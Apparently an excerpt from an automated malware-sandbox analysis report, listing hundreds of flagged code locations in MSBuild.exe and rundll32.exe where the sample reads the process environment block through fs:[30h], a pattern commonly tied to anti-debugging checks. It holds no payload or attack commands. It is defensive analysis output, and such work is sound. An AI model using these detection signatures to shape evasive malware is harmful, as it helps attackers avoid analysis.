          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_04A52581 mov eax, dword ptr fs:[00000030h]
